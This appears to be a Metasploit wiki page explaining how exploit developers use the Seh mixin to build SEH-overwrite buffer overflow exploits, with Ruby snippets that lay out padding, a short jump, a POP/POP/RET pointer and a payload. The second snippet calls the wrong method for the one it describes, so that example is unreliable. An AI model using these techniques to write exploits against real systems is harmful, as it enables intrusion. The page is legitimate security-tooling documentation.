-
Notifications
You must be signed in to change notification settings - Fork 14.1k
How to use the Seh mixin to exploit an exception handler
Exception handler overwriting was once a very popular technique to exploit stack buffer overflows, but isn't so common anymore in newer programs because most likely they're compiled with SafeSEH. At one point, even with SafeSEH enabled, it was still possible to abuse an exception handler by heap spraying, but of course, memory protections didn't stop there. DEP/FASLR eventually came to the rescue, so that pretty much terminated the glory days of SEH exploits. You can probably still find vulnerable applications not compiled with SafeSEH, but chances are the app is outdated, no longer maintained, or it is more of a learning experiment for the developer. Nonetheless, exploiting a stack buffer overflow with exception handling is still fun, so if you do come across it, here's how it's supposed to be written with Metasploit's Seh mixin.
To be able to use the SEH mixin, some exploitable requirements must be met:
- The vulnerable program does not have SafeSEH in place.
- No DEP (Data Execution Prevention). The mixin uses a short jump to be able to execute the payload, which means the memory must be executable. DEP, as the name implies, prevents that.
There are two methods provided by the Seh mixin:
-
generate_seh_payload- Generates a fake SEH record with the payload attached right after. You will have to provide the pointer (address) for the SE Handler, usually a POP/POP/RET. Code example:
buffer = ''
buffer << "A" * 1024 # 1024 bytes of padding
buffer << generate_seh_payload(target.ret) # SE record overwritten after 1024 bytesThe actual layout of buffer should look like this in memory:
[ 1024 bytes of 'A' ][ A short jump ][ target.ret ][ Payload ]
Note: You can use Metasploit's msfbinscan utility (found in the tools directory) to find all the POP/POP/RET addresses, or other variants that can be used for the same purpose.
-
generate_seh_record- Generates a fake SEH record without the payload, in case you prefer to place the payload somewhere else. Code example:
buffer = ''
buffer << "A" * 1024 # 1024 bytes of padding
buffer << generate_seh_payload(target.ret)
buffer << "B" * 1024 # More paddingThe memory layout should like this:
[ 1024 bytes of 'A' ][ A short jump ][ target.ret ][ Padding ]
https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/exploitation/seh.rb
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/seh.rb
- Home Welcome to Metasploit!
- Using Metasploit A collection of useful links for penetration testers.
-
Setting Up a Metasploit Development Environment From
apt-get installtogit push. - CONTRIBUTING.md What should your contributions look like?
- Landing Pull Requests Working with other people's contributions.
- Using Git All about Git and GitHub.
- Contributing to Metasploit Be a part of our open source community.
- Meterpreter All about the Meterpreter payload.